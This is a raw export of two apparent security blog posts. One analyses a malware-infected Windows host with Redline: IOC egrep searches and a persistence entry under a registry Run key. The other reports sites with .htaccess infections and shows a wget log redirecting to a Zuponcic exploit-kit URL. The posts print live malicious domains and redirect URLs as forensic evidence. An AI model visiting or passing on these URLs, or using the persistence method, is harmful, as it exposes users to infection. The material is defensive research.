<a href="http://2.bp.blogspot.com/-1mvYG4N2XMw/U9mFcdMSCaI/AAAAAAAAAgc/BWJ4jsfStU8/s1600/Redline_process-start-mal-exe-3a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-1mvYG4N2XMw/U9mFcdMSCaI/AAAAAAAAAgc/BWJ4jsfStU8/s1600/Redline_process-start-mal-exe-3a.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-vBHkwIwcm_I/U9mFce6FKZI/AAAAAAAAAgg/0WDkYCdH49c/s1600/Redline_process-start-mal-exe-3b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-vBHkwIwcm_I/U9mFce6FKZI/AAAAAAAAAgg/0WDkYCdH49c/s1600/Redline_process-start-mal-exe-3b.png" /></a></div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;">Malware EXE process opened port listener:</span><span style="font-family: Arial,Helvetica,sans-serif;"></span></div>
</div>
<div style="text-align: left;">
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-LkgEjuC6tDs/U9gUVgDS_LI/AAAAAAAAAeE/3YiV5b4R1bo/s1600/Redline_process-start-mal-exe-ports-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-LkgEjuC6tDs/U9gUVgDS_LI/AAAAAAAAAeE/3YiV5b4R1bo/s1600/Redline_process-start-mal-exe-ports-1.png" height="*" width="800" /></a></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-LkgEjuC6tDs/U9gUVgDS_LI/AAAAAAAAAeE/3YiV5b4R1bo/s1600/Redline_process-start-mal-exe-ports-1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><a href="http://1.bp.blogspot.com/-LkgEjuC6tDs/U9gUVgDS_LI/AAAAAAAAAeE/3YiV5b4R1bo/s1600/Redline_process-start-mal-exe-ports-1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a></div>
</div>
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-OLc0v8W948k/U9gUVojB8ZI/AAAAAAAAAeI/bniLYkPRpjc/s1600/Redline_process-start-mal-exe-ports-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-OLc0v8W948k/U9gUVojB8ZI/AAAAAAAAAeI/bniLYkPRpjc/s1600/Redline_process-start-mal-exe-ports-1a.png" /></a></div>
<br />
<div style="text-align: left;">
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;">Registry key with binary data created:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-ex8-5IReIkg/U9gYuDac-BI/AAAAAAAAAe8/b5vUa1RrgwI/s1600/Redline_registry-malware-binary-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-ex8-5IReIkg/U9gYuDac-BI/AAAAAAAAAe8/b5vUa1RrgwI/s1600/Redline_registry-malware-binary-1.png" height="*" width="800" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-kR3P5pNpi4k/U9gYuOGyCCI/AAAAAAAAAfA/KhiPbd3iEsw/s1600/Redline_registry-malware-binary-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-kR3P5pNpi4k/U9gYuOGyCCI/AAAAAAAAAfA/KhiPbd3iEsw/s1600/Redline_registry-malware-binary-1a.png" /></a></div>
<div class="separator" style="clear: both;">
<br /></div>
</div>
<span style="font-family: Arial,Helvetica,sans-serif;">Creating persistence using registry RUN key under HKCU:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-dcVrajyb2ZM/U9l6EBDRggI/AAAAAAAAAfs/Hu1CzdwU2lg/s1600/Redline_persistence-registry-mal-exe-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-dcVrajyb2ZM/U9l6EBDRggI/AAAAAAAAAfs/Hu1CzdwU2lg/s1600/Redline_persistence-registry-mal-exe-2.png" height="*" width="800" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Y60QCKhIcVQ/U9l6EDYFPtI/AAAAAAAAAfo/_HDZEIGrfyE/s1600/Redline_persistence-registry-mal-exe-2a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-Y60QCKhIcVQ/U9l6EDYFPtI/AAAAAAAAAfo/_HDZEIGrfyE/s1600/Redline_persistence-registry-mal-exe-2a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Creation of port listeners:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-8zm4la49Dw8/U9mEWQpZChI/AAAAAAAAAgM/ZsbUmLK3KXE/s1600/Redline_port-create-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-8zm4la49Dw8/U9mEWQpZChI/AAAAAAAAAgM/ZsbUmLK3KXE/s1600/Redline_port-create-1a.png" height="*" width="800" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-T-P42VLfZxU/U9mEWTJhL1I/AAAAAAAAAgQ/nncoUGoOmEo/s1600/Redline_port-create-1b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-T-P42VLfZxU/U9mEWTJhL1I/AAAAAAAAAgQ/nncoUGoOmEo/s1600/Redline_port-create-1b.png" /></a></div>
<br />
<br />
<h2>
<span style="font-family: Arial,Helvetica,sans-serif;">Using Bash-Fu on Redline XML data</span></h2>
<span style="font-family: Arial,Helvetica,sans-serif;">Using some bash commands (possibly even using Cygwin on Windows) can be very useful and powerful. Here some examples.</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Searching for some network indicators:</span><br />
<div style="text-align: left;">
</div>
<pre><span style="font-family: "Courier New",Courier,monospace;">
<b>$ time egrep -ci "(prodigymsnteregala.com|\/js\/java\.js|ANLxMYn\.jar|qkejZDj\.jar|\/listing\/chn\/all\.html|93\.115\.88\.220)" *.* | egrep -v ":0"</b>
filedownloadhistory.dn62ZQQu8mWeY2Us5OFZc8:4
urlhistory.lLtR9WqWo8Sd3VL2RgOU0F:5
w32registryapi.arN9dzNMIyQdHnxvUGnJzz:2
real 0m17.630s
user 0m17.456s
sys 0m0.171s
<b>$ egrep -i "(prodigymsnteregala.com|\/js\/java\.js|ANLxMYn\.jar|qkejZDj\.jar|\/listing\/chn\/all\.html|93\.115\.88\.220)" *.*</b>
filedownloadhistory.dn62ZQQu8mWeY2Us5OFZc8:<SourceURL>http://mw.prodigymsnteregala.com/favicon.ico</SourceURL>
filedownloadhistory.dn62ZQQu8mWeY2Us5OFZc8:<SourceURL>http://mw.prodigymsnteregala.com/</SourceURL>
filedownloadhistory.dn62ZQQu8mWeY2Us5OFZc8:<SourceURL>http://mw.prodigymsnteregala.com/tr.gif</SourceURL>
filedownloadhistory.dn62ZQQu8mWeY2Us5OFZc8:<SourceURL>http://mw.prodigymsnteregala.com/js/java.js</SourceURL>
urlhistory.lLtR9WqWo8Sd3VL2RgOU0F:<URL>http://mw.prodigymsnteregala.com/favicon.ico</URL>
urlhistory.lLtR9WqWo8Sd3VL2RgOU0F:<URL>http://mw.prodigymsnteregala.com</URL>
urlhistory.lLtR9WqWo8Sd3VL2RgOU0F:<URL>:Host: mw.prodigymsnteregala.com</URL>
urlhistory.lLtR9WqWo8Sd3VL2RgOU0F:<URL>http://mw.prodigymsnteregala.com</URL>
urlhistory.lLtR9WqWo8Sd3VL2RgOU0F:<URL>http://mw.prodigymsnteregala.com</URL>
w32registryapi.arN9dzNMIyQdHnxvUGnJzz:<Path>HKEY_USERS\S-1-5-21-3096987436-3122932343-3109395949-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore\AllowedDomains\prodigymsnteregala.com</Path>
w32registryapi.arN9dzNMIyQdHnxvUGnJzz:<KeyPath>Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore\AllowedDomains\prodigymsnteregala.com</KeyPath>
<b>$ egrep -in -C 10 "prodigymsnteregala.com" w32registryapi.* | egrep -m 1 -A 15 "<RegistryItem " | egrep -m 1 -B 15 "</RegistryItem>"</b>
6674509-<RegistryItem xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" uid="FEBFAC4B-E50C-469E-A25A-2C42BE0653BE" created="2014-07-14T01:14:20Z">
<Username>TOMS-VM-WIN7X64\Tom</Username>
6674510-<SecurityID>S-1-5-21-3096987436-3122932343-3109395949-1000</SecurityID>
6674511:<Path>HKEY_USERS\S-1-5-21-3096987436-3122932343-3109395949-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore\AllowedDomains\prodigymsnteregala.com</Path>
6674512-<Hive>HKEY_USERS\S-1-5-21-3096987436-3122932343-3109395949-1000</Hive>
6674513:<KeyPath><span style="background-color: yellow;">Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore\AllowedDomains\prodigymsnteregala.com</span></KeyPath>
6674514-<Type>REG_KEY</Type>
6674515-<Modified>2014-07-13T22:01:39Z</Modified>
6674516-<NumSubKeys>0</NumSubKeys>
6674517-<NumValues>0</NumValues>
6674518-</RegistryItem>
</span></pre>
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Searching for some host indicators (filenames, registry keys):</span>
<br />
<pre><span style="font-family: "Courier New",Courier,monospace;">
<b>$ time egrep -ci "(DPNLOBBYG.EXE|483759317.TMP|Egkyxzdcin|7538554d-326909f3|JXZFUV)" *.* | egrep -v ":0"</b>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:8
w32apifiles.issues.6F4XA71eDhdfIujMDqoLCI:1
w32eventlogs.eOZaQVjGh3PdAuYt0LXxMR:8
w32prefetch.biHxIPURFOEdQgUKV9vyvp:12
w32processes-memory.jblWPV86pwBeohXjunTY1h:3
w32registryapi.arN9dzNMIyQdHnxvUGnJzz:20
w32scripting-persistence.h3IHm1tXBUpdceHRhAJicc:5
real 0m17.755s
user 0m17.565s
sys 0m0.170s
<b>$ egrep -i "(DPNLOBBYG.EXE|483759317.TMP|Egkyxzdcin|7538554d-326909f3|JXZFUV)" w32apifiles.* w32scripting-persistence.*</b>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:<FullPath>C:\Users\Tom\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13\7538554d-326909f3</FullPath>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:<FileName>7538554d-326909f3</FileName>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:<FullPath>C:\Users\Tom\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13\7538554d-326909f3.idx</FullPath>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:<FileName>7538554d-326909f3.idx</FileName>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:<FullPath>C:\Windows\Prefetch\483759317.TMP-EB4905C2.pf</FullPath>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:<FileName>483759317.TMP-EB4905C2.pf</FileName>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:<FullPath>C:\Windows\Prefetch\DPNLOBBYG.EXE-603267D1.pf</FullPath>
w32apifiles.8xDv3nsauGodpXnrHsaHqg:<FileName>DPNLOBBYG.EXE-603267D1.pf</FileName>
w32scripting-persistence.h3IHm1tXBUpdceHRhAJicc:<RegText>C:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</RegText>
w32scripting-persistence.h3IHm1tXBUpdceHRhAJicc:<FilePath>c:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</FilePath>
w32scripting-persistence.h3IHm1tXBUpdceHRhAJicc:<FullPath>c:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</FullPath>
w32scripting-persistence.h3IHm1tXBUpdceHRhAJicc:<FileName>dpnlobbyg.exe</FileName>
w32scripting-persistence.h3IHm1tXBUpdceHRhAJicc:<Text>C:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</Text>
<b>$ egrep -in -B 10 -A 120 "DPNLOBBYG.EXE" w32scripting-persistence.* | egrep -m 1 -A 100 "<PersistenceItem " | egrep -m 1 -B 100 "</PersistenceItem>"</b>
96-<<span style="background-color: #6fa8dc;">PersistenceItem </span>xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" uid="C10D94E7-43A9-4160-A0EC-2C5BB246697F" created="2014-07-14T01:11:17Z">
<PersistenceType>registry</PersistenceType>
97-<RegPath>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DLLS</RegPath>
98:<RegText>C:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</RegText>
99-<RegOwner>NT AUTHORITY\SYSTEM</RegOwner>
100-<RegModified>2014-07-13T22:44:51Z</RegModified>
101:<FilePath>c:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</FilePath>
102-<FileOwner>TOMS-VM-WIN7X64\Tom</FileOwner>
103-<FileCreated>2014-07-13T22:01:47Z</FileCreated>
104-<FileModified>2014-07-13T22:01:47Z</FileModified>
105-<FileAccessed>2014-07-13T22:01:47Z</FileAccessed>
106-<FileChanged>2014-07-13T22:01:47Z</FileChanged>
107-<md5sum><span style="background-color: yellow;">105ead6f908f0d8cbab11a0f4408d373</span></md5sum>
108-<<span style="background-color: cyan;">FileItem </span>xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" uid="7B6CDDEB-3A25-4568-9D31-AF18EB68C23E" created="2014-07-14T01:11:17Z">
<DevicePath>\Device\HariskVolume1</DevicePath>
109:<FullPath>c:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</FullPath>
110-<Drive>c</Drive>
111-<FilePath>Users\Tom\AppData\Roaming</FilePath>
112:<FileName>dpnlobbyg.exe</FileName>
113-<FileExtension>exe</FileExtension>
114-<SizeInBytes>276992</SizeInBytes>
115-<Created>2014-07-13T22:01:47Z</Created>
116-<Modified>2014-07-13T22:01:47Z</Modified>
117-<Accessed>2014-07-13T22:01:47Z</Accessed>
118-<Changed>2014-07-13T22:01:47Z</Changed>
119-<FileAttributes>ReadOnly Hidden System Archive</FileAttributes>
120-<Username>TOMS-VM-WIN7X64\Tom</Username>
121-<SecurityID>S-1-5-21-3096987436-3122932343-3109395949-1000</SecurityID>
122-<SecurityType>SidTypeUser</SecurityType>
123-<Md5sum><span style="background-color: yellow;">105ead6f908f0d8cbab11a0f4408d373</span></Md5sum>
124-<<span style="background-color: cyan;">PEInfo</span>></span></pre>
<pre><span style="font-family: "Courier New",Courier,monospace;"> <Type>Executable</Type>
125-<Subsystem>Windows_GUI</Subsystem>
126-<BaseAddress>4194304</BaseAddress>
127-<PETimeStamp>2012-02-23T05:41:05Z</PETimeStamp>
128-<PEChecksum><PEFileRaw>0</PEFileRaw>
129-<PEFileAPI>0</PEFileAPI>
130-<PEComputedAPI>287748</PEComputedAPI>
131-</PEChecksum>
132-<ExtraneousBytes>229376</ExtraneousBytes>
133-<<span style="background-color: orange;">DetectedAnomalies</span>><string><span style="background-color: yellow;">checksum_is_zero</span></string>
134-<string><span style="background-color: yellow;">contains_eof_data</span></string>
135-</<span style="background-color: orange;">DetectedAnomalies</span>>
136-<Sections></span></pre>
<pre><span style="font-family: "Courier New",Courier,monospace;"> <NumberOfSections>3</NumberOfSections>
137-<ActualNumberOfSections>3</ActualNumberOfSections>
138-<Section><Name>.text</Name>
139-<Type>None</Type>
140-<SizeInBytes>43008</SizeInBytes>
141-<DetectedCharacteristics>Read Execute Code</DetectedCharacteristics>
142-<Entropy AverageValue="0.77262239772402574"/>
143-</Section>
144-<Section><Name>.rsrc</Name>
145-<Type>None</Type>
146-<SizeInBytes>3584</SizeInBytes>
147-<DetectedCharacteristics>Read</DetectedCharacteristics>
148-<Entropy AverageValue="0.54873274859376076"/>
149-</Section>
150-<Section><Name>.reloc</Name>
151-<Type>None</Type>
152-<SizeInBytes>512</SizeInBytes>
153-<DetectedCharacteristics>Read</DetectedCharacteristics>
154-<Entropy AverageValue="0.048149053317863157"/>
155-</Section>
156-</Sections>
157-</<span style="background-color: cyan;">PEInfo</span>>
158-<PeakEntropy>0.77262239772402574</PeakEntropy>
159-<PeakCodeEntropy><span style="background-color: yellow;">0.77262239772402574</span></PeakCodeEntropy>
160-</<span style="background-color: cyan;">FileItem</span>>
161-<<span style="background-color: cyan;">RegistryItem </span>xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" uid="91340226-5657-48BB-9DAB-44F07BFD14BD" created="2014-07-14T01:11:17Z">
<KeyPath>Microsoft\ndows\CurrentVersion\Run\</KeyPath>
162-<Type>REG_SZ</Type>
163-<Modified>2014-07-13T22:44:51Z</Modified>
164-<span style="background-color: yellow;"><ValueName>DLLS</ValueName></span>
165-<Username>NT AUTHORITY\SYSTEM</Username>
166:<span style="background-color: yellow;"><Text>C:\Users\Tom\AppData\Roaming\dpnlobbyg.exe</Text></span>
167-<ReportedLengthInBytes>86</ReportedLengthInBytes>
168-<Hive>HKEY_CURRENT_USER\Software</Hive>
169-<Path>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DLLS</Path>
170-<SecurityID>S-1-5-18</SecurityID>
171-</<span style="background-color: cyan;">RegistryItem</span>>
172-</<span style="background-color: #6fa8dc;">PersistenceItem</span>>
</span></pre>
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Looking at the raw XML usually should help with creating IOC's later.</span>
<br />
<br />
<h2>
<span style="font-family: Arial,Helvetica,sans-serif;">Conclusion</span></h2>
<span style="font-family: Arial,Helvetica,sans-serif;">Mandiant's Redline software is free to download and use. I find it amazing how much details can be found by analyzing a host with Redline and how easy it is to create a timeline for analysis.</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Redline can combine disk and memory artifacts in a timeline, showing processes created and ports opened in time relation to files and registry keys created.</span><br />
<br />
<div style="text-align: left;">
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><span style="font-family: Arial,Helvetica,sans-serif;">I think Redline is much more useful than what it costs! :-)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;">Are you using Redline yet and have some feedback or suggestions? I'd love to hear it...</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;">In the next post I plan to show how to create IOC's from this analysis and how to check for IOC matches on a host. Stay tuned...</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;">Cheers,</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;">@c_APT_ure</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
</div>
<!-- Blogger automated replacement: "https://images-blogger-opensocial.googleusercontent.com/gadgets/proxy?url=http%3A%2F%2F3.bp.blogspot.com%2F-23FEE0acgHk%2FU9mNCZzwkKI%2FAAAAAAAAAg0%2FcvxHXE34E0I%2Fs1600%2FRedline_collection-files-3.png&container=blogger&gadget=a&rewriteMime=image%2F*" with "https://3.bp.blogspot.com/-23FEE0acgHk/U9mNCZzwkKI/AAAAAAAAAg0/cvxHXE34E0I/s1600/Redline_collection-files-3.png" -->TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com6tag:blogger.com,1999:blog-4767199732858434539.post-48054244398498608262014-06-03T13:59:00.000-07:002014-06-03T13:59:00.722-07:00Two years later...By chance I just noticed that I wrote the <a href="http://c-apt-ure.blogspot.com/2012/06/introducing-ponmocup-finder.html" target="_blank">Introducing Ponmocup Finder</a> blog post exactly two years ago.<br />
<br />
So it's time to celebrate the second anniversary :-)<br />
<br />
Well, I was wondering if anyone else is currently detecting the .htaccess infections that Ponmocup Finder (PF) reports. Let's see...<br />
<br />
Let's just look at any of the almost 500 domains currently being detected by PF as infected.<br />
<br />
http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-infected-domains-history-days-sort.txt<br />
<br />
<pre>439 www.pino-travel.com
439 www.log-in-verlag.de
438 www.oople.com
438 www.franken-gmbh.de
438 www.brichzin.de
<span style="background-color: yellow;">438 www.bad-saulgau.de</span>
437 www.vitaminbude.de</pre>
<br />
This German site has been seen infected since more than 430 days.<br />
<br />
Here's todays "evidence" from my <a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-finder_scripts.txt" target="_blank">PF scripts</a> that this domain is infected. It sets a cookie and redirects to Zuponcic Kit as discussed in previous (linked) blogs and presentations.<br />
<br />
http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/www.bad-saulgau.de_wget_log.txt<br />
<br />
<pre>--12:06:50-- http://www.bad-saulgau.de/
=> `www.bad-saulgau.de_out.txt'
Resolving www.bad-saulgau.de... 82.165.95.226
Connecting to www.bad-saulgau.de|82.165.95.226|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 302 Found
Date: Tue, 03 Jun 2014 10:06:50 GMT
Server: Apache
<span style="background-color: yellow;">Set-Cookie: tTF=50; path=/; domain=www.bad-saulgau.de; expires=Wed, 11-Jun-2014 08:44:50 GMT</span>
<span style="background-color: yellow;">Location: http://solent.alloyradianttubes.com/neo/darla/php/fc.php?trace=folder_inbox&tID=6&d=0&f=978500093&l=SKY%2CREC%2CMNW&rn=1341221058138&en=utf-8&filter=no_expandable%253Bajax_cert_expandable%253Bexp_iframe_expandable%253B&ref=http%3A%2F%2Fwww.bad-saulgau.de%2F&sa=content%253D%2522minty_tenure%253A%2520week%25203+%2522</span>
Content-Length: 536
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Location: http://solent.alloyradianttubes.com/neo/darla/php/fc.php?trace=folder_inbox&tID=6&d=0&f=978500093&l=SKY%2CREC%2CMNW&rn=1341221058138&en=utf-8&filter=no_expandable%253Bajax_cert_expandable%253Bexp_iframe_expandable%253B&ref=http%3A%2F%2Fwww.bad-saulgau.de%2F&sa=content%253D%2522minty_tenure%253A%2520week%25203+%2522 [following]
--12:06:50-- http://solent.alloyradianttubes.com/neo/darla/php/fc.php?trace=folder_inbox&tID=6&d=0&f=978500093&l=SKY%2CREC%2CMNW&rn=1341221058138&en=utf-8&filter=no_expandable%253Bajax_cert_expandable%253Bexp_iframe_expandable%253B&ref=http%3A%2F%2Fwww.bad-saulgau.de%2F&sa=content%253D%2522minty_tenure%253A%2520week%25203+%2522
=> `www.bad-saulgau.de_out.txt'
Resolving solent.alloyradianttubes.com... 31.210.96.155
Connecting to solent.alloyradianttubes.com|31.210.96.155|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.1.4
Date: Tue, 03 Jun 2014 10:06:50 GMT
Content-Type: text/html
Content-Length: 160
Connection: close
Location: http://www.google.com/
Location: http://www.google.com/ [following]</pre>
<pre> </pre>
The redirection to Google is an anti-detection method from Zuponcic Kit also <a href="http://blog.fox-it.com/2013/12/19/not-quite-the-average-exploit-kit-zuponcic/" target="_blank">discussed before</a> on the Fox-IT blog.<br />
<br />
So now the question is: Is anyone else detecting these .htaccess infected sites?<br />
<br />
I haven't found any other detections. If you know of one, please let me know.<br />
<br />
<a href="http://www.urlvoid.com/scan/bad-saulgau.de/">http://www.urlvoid.com/scan/bad-saulgau.de/</a><br />
<br />
<h3>
Website Information</h3>
<span style="background-color: yellow;">
</span><table class="table table-bordered"><tbody>
<tr><td width="220">Analysis Date</td><td>8 seconds ago</td></tr>
<tr><td><span style="background-color: yellow;">Safety Reputation</span></td><td><span style="background-color: yellow;"><span class="label label-success">0/28</span></span></td></tr>
<tr><td>Domain 1st Registered</td><td>Unknown</td></tr>
<tr><td>Server Location</td><td><img alt="Flag" src="http://www.urlvoid.com/images/flags/de.gif" /> (DE) Germany</td></tr>
<tr><td>Google Page Rank</td><td><img alt="Google Page Rank" src="http://www.urlvoid.com/images/primages/pr4.gif" /></td></tr>
<tr><td>Alexa Traffic Rank</td><td>1,751,096</td></tr>
</tbody></table>
<br />
URLQuery can <a href="http://urlquery.net/domain_graph.php?id=1401817329491" target="_blank">detect the redirection</a> to Zuponcic Kit (assuming the user sets a required referrer URL), but there are no indications in the report that there is anything malicious.<br />
<br />
<a href="http://urlquery.net/report.php?id=1401817329491">http://urlquery.net/report.php?id=1401817329491</a><br />
<br />
<h2>
Overview</h2>
<span style="background-color: yellow;">
</span><span style="background-color: yellow;">
</span><span style="background-color: yellow;">
</span><table>
<tbody>
<tr class="odd">
<td class="odd_heading" style="vertical-align: top;">URL</td><td style="color: black; vertical-align: top;">www.bad-saulgau.de/</td>
<td rowspan="7" width="226px">
<br /> </td>
</tr>
<tr class="even">
<td class="even_heading">IP</td><td>82.165.95.226</td>
</tr>
<tr class="odd">
<td class="odd_heading">ASN</td><td>AS8560 1&1 Internet AG</td>
</tr>
<tr class="even">
<td class="even_heading">Location</td><td><img height="11" src="http://urlquery.net/images/flags/de.png" title="Germany" width="16" /> Germany</td>
</tr>
<tr class="odd">
<td class="odd_heading">Report completed</td><td>2014-06-03 19:42:06 CET</td>
</tr>
<tr class="even">
<td class="even_heading">Status</td><td id="status"><b style="color: darkgreen;">Report complete.</b></td>
</tr>
<tr class="odd">
<td class="odd_heading"><span style="background-color: yellow;">urlQuery Alerts</span></td><td><span style="background-color: yellow;">
No alerts detected</span> </td></tr>
</tbody></table>
<span style="background-color: yellow;">
</span><h2>
Settings</h2>
<table>
<tbody>
<tr class="odd">
<td class="odd_heading">UserAgent</td><td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0</td>
</tr>
<tr class="even">
<td class="even_heading">Referer</td><td>http://www.google.com/url?q=ponmocup+finder</td>
</tr>
<tr class="odd">
<td class="odd_heading">Pool</td><td><br /></td>
</tr>
<tr class="even">
<td class="even_heading">Access Level</td><td>public</td>
</tr>
</tbody>
</table>
<br /><h2>
Intrusion Detection Systems</h2>
<table>
<tbody>
<tr class="odd"><td class="odd_heading"><span style="background-color: yellow;">Snort /w Sourcefire VRT</span></td><td style="padding: 0px;"><span style="background-color: yellow;"> No alerts detected</span></td></tr>
<tr class="even"><td class="even_heading"><span style="background-color: yellow;">Suricata /w Emerging Threats Pro</span></td><td style="padding: 0px;"><span style="background-color: yellow;"> No alerts detected</span></td></tr>
</tbody>
</table>
<h2>
Blacklists</h2>
<table>
<tbody>
<tr class="odd"><td class="odd_heading"><span style="background-color: yellow;">DNS-BH / malwaredomains.com</span></td><td style="padding: 0px;"><span style="background-color: yellow;"> No alerts detected</span></td></tr>
<tr class="even"><td class="even_heading"><span style="background-color: yellow;">PhishTank / phishtank.com</span></td><td style="padding: 0px;"><span style="background-color: yellow;"> No alerts detected</span></td></tr>
<tr class="odd"><td class="odd_heading"><span style="background-color: yellow;">Spamhaus DBL / spamhaus.org</span></td><td style="padding: 0px;"><span style="background-color: yellow;"> No alerts detected</span></td></tr>
</tbody>
</table>
<h2>
Files Captured</h2>
<table><tbody>
<tr class="odd"><td class="odd_heading">Suricata IDS</td><td style="padding: 0px;"> No files captured</td></tr>
</tbody></table>
<br />
And also VirusTotal doesn't have any malware or malicious activity associated with this domain:<br />
<br />
<a href="https://www.virustotal.com/en/domain/www.bad-saulgau.de/information/">https://www.virustotal.com/en/domain/www.bad-saulgau.de/information/</a><br />
(none)<br />
<br />
<br />
<a href="https://www.virustotal.com/en/url/c6ef57b6a1eee4ec6dacb3cea61541137d6cd5da8daec570c8444db63fc08e1d/analysis/1401828323/">https://www.virustotal.com/en/url/c6ef57b6a1eee4ec6dacb3cea61541137d6cd5da8daec570c8444db63fc08e1d/analysis/1401828323/</a><br />
<br />
<table class="table table-plain"><tbody>
<tr><td>URL:
</td>
<td style="max-width: 600px; word-wrap: break-word;">
http://www.bad-saulgau.de/
</td>
</tr>
<tr>
<td>
Detection ratio:
</td>
<td class="text-green">
<span style="background-color: yellow;">0 / 52
</span></td>
</tr>
<tr>
<td>
Analysis date:
</td>
<td class="ltr">
2014-06-03 20:45:23 UTC
